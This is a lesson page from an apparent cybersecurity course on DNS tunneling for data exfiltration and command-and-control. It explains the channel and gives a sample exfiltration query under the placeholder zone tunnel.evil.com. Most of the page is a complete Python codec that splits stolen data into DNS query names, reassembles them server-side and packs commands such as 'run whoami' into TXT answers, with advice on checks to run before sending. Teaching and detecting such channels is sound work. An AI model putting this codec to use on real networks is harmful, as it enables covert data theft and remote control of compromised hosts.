Cyber Security Academy · Lesson

DNS Tunneling and Exfiltration

Smuggling data over DNS.

Smuggling Data Over DNS

DNS tunneling encodes arbitrary data inside DNS queries and responses, turning the name system into a covert communication channel. Because nearly every network allows DNS to leave the perimeter, it is a favorite path for data exfiltration and command-and-control (C2).

Even when a firewall blocks all direct outbound traffic, hosts can usually still reach an internal resolver, and that resolver recurses to the Internet on their behalf. Any query for a name under the attacker's zone is eventually delivered to the attacker's authoritative server, and the answer travels back along the same path, which is enough for a full bidirectional channel.

How the Channel Works

The attacker controls the authoritative name server for a domain, say tunnel.evil.com. The implant never talks to that server directly: it asks the local resolver for a name under the zone, the resolver recurses to the attacker's server, and the answer comes back through the same path. Outbound data is encoded into the left-hand labels of the query name, below the attacker's zone:

  • Data goes out as <base32-chunk>.tunnel.evil.com. A single label is limited to 63 octets and the whole name to 253 characters, so one query carries well under 200 bytes of raw data. Names are case-insensitive and some resolvers randomise case, so tunnels use base32 or another single-case alphabet rather than base64, and a sequence number or nonce keeps every name unique so that no resolver serves it from cache.
  • The authoritative server returns instructions inside TXT, CNAME, or NULL records. TXT and NULL hold more data per answer than a name-valued record, so they are the usual choice for the downstream direction.

Each query/answer pair carries a small payload chunk, so moving any real volume of data produces a burst of queries for long, unique, high-entropy names under a single domain. That pattern is also the main signal defenders look for.

mv4gm2lmorzgc5dfmqwxgzldojsxi.tunnel.evil.com
# base32 of "exfiltrated-secret" in the query label, padding stripped
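The chunking, the size limits and both directions of the channel described above, as an added worked example that is not part of the lesson and does not reproduce any real tunnelling tool. The name layout <seq>.<data labels>.<session>.tunnel.evil.com, the session label and the 4-hex-digit sequence number are assumptions of this example; tunnel.evil.com is the lesson's own placeholder zone. Only the Python standard library is used, and the sample payload is constructed inline.

```python
"""Toy DNS tunnel codec: client-side encoding of data into query names,
server-side reassembly, and instructions packed into TXT answers.
Added example for this lesson; the name layout is an assumption, not any
real tool's protocol."""
import base64

ZONE = "tunnel.evil.com"   # placeholder attacker-controlled zone from the lesson
MAX_LABEL = 63             # RFC 1035: a label is at most 63 octets
MAX_NAME = 253             # presentation-format name limit (255 octets on the wire)
MAX_TXT_STRING = 255       # one <character-string> inside TXT RDATA
BYTES_PER_LABEL = 39       # 39 raw bytes -> exactly 63 unpadded base32 chars


def b32label(chunk: bytes) -> str:
    # Names are case-insensitive and resolvers may randomise case, so use the
    # single-case base32 alphabet; padding is dropped because '=' is not a
    # valid hostname character.
    return base64.b32encode(chunk).decode().rstrip("=").lower()


def unb32label(label: str) -> bytes:
    text = label.upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def labels_per_query(session: str, zone: str = ZONE) -> int:
    # Fixed overhead: 4-hex-digit sequence label, session label, zone, dots.
    fixed = 4 + 1 + len(session) + 1 + len(zone)
    return (MAX_NAME - fixed) // (MAX_LABEL + 1)


def encode_queries(payload: bytes, session: str, zone: str = ZONE) -> list[str]:
    """Client side: split payload into query names that respect DNS limits.
    Layout (assumed): <seq>.<data>[.<data>...].<session>.<zone>"""
    per_query = labels_per_query(session, zone) * BYTES_PER_LABEL
    names = []
    for seq, off in enumerate(range(0, len(payload), per_query)):
        chunk = payload[off:off + per_query]
        data = [b32label(chunk[i:i + BYTES_PER_LABEL])
                for i in range(0, len(chunk), BYTES_PER_LABEL)]
        names.append(".".join([f"{seq:04x}", *data, session, zone]))
    return names


def wire_qname(name: str) -> bytes:
    """Encode a name in DNS wire format, rejecting anything over the limits."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 1 <= len(raw) <= MAX_LABEL:
            raise ValueError(f"label of {len(raw)} octets is not allowed")
        out += bytes([len(raw)]) + raw
    out += b"\x00"
    if len(out) > 255:
        raise ValueError(f"name is {len(out)} octets on the wire, limit is 255")
    return out


def fits_in_dns(name: str) -> bool:
    try:
        wire_qname(name)
        return True
    except ValueError:
        return False


def decode_queries(names: list[str], zone: str = ZONE) -> dict[str, bytes]:
    """Server side: reassemble each session's payload from observed query names,
    tolerating out-of-order arrival and ignoring names outside the zone."""
    zone_labels = zone.split(".")
    sessions: dict[str, dict[int, bytes]] = {}
    for name in names:
        labels = name.rstrip(".").lower().split(".")
        if labels[-len(zone_labels):] != zone_labels:
            continue
        inner = labels[:-len(zone_labels)]
        if len(inner) < 3:
            continue
        seq, *data, session = inner
        chunk = b"".join(unb32label(label) for label in data)
        sessions.setdefault(session, {})[int(seq, 16)] = chunk
    return {s: b"".join(chunks[k] for k in sorted(chunks))
            for s, chunks in sessions.items()}


def encode_txt_answer(instruction: bytes) -> list[bytes]:
    """Server side: pack an instruction into TXT character-strings. TXT data
    keeps its case, so base64 is usable here; each string is at most 255 octets."""
    text = base64.b64encode(instruction)
    return [text[i:i + MAX_TXT_STRING] for i in range(0, len(text), MAX_TXT_STRING)]


def decode_txt_answer(strings: list[bytes]) -> bytes:
    return base64.b64decode(b"".join(strings))


if __name__ == "__main__":
    # Constructed sample payload; no real data.
    secret = b"exfiltrated-secret" * 20
    queries = encode_queries(secret, "s7")
    assert all(fits_in_dns(q) for q in queries)
    print(f"{len(secret)} bytes -> {len(queries)} queries, first: {queries[0][:40]}...")
    assert decode_queries(queries[::-1])["s7"] == secret
    answer = encode_txt_answer(b"run whoami")
    assert decode_txt_answer(answer) == b"run whoami"
```

With the lesson's zone and a two-character session label, three 63-octet data labels fit in one name, so a query moves 117 raw bytes; 360 bytes of sample payload becomes four queries, and the server side reassembles them correctly even when they arrive in reverse order. wire_qname is the check a practitioner wants before sending: it refuses a 64-octet label or a name over 255 octets on the wire, which is exactly where a naive chunker breaks.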

All lessons in this course

  1. How DNS Works and Its Risks
  2. DNS Spoofing and Cache Poisoning
  3. DNS Tunneling and Exfiltration
  4. DNSSEC and DNS Filtering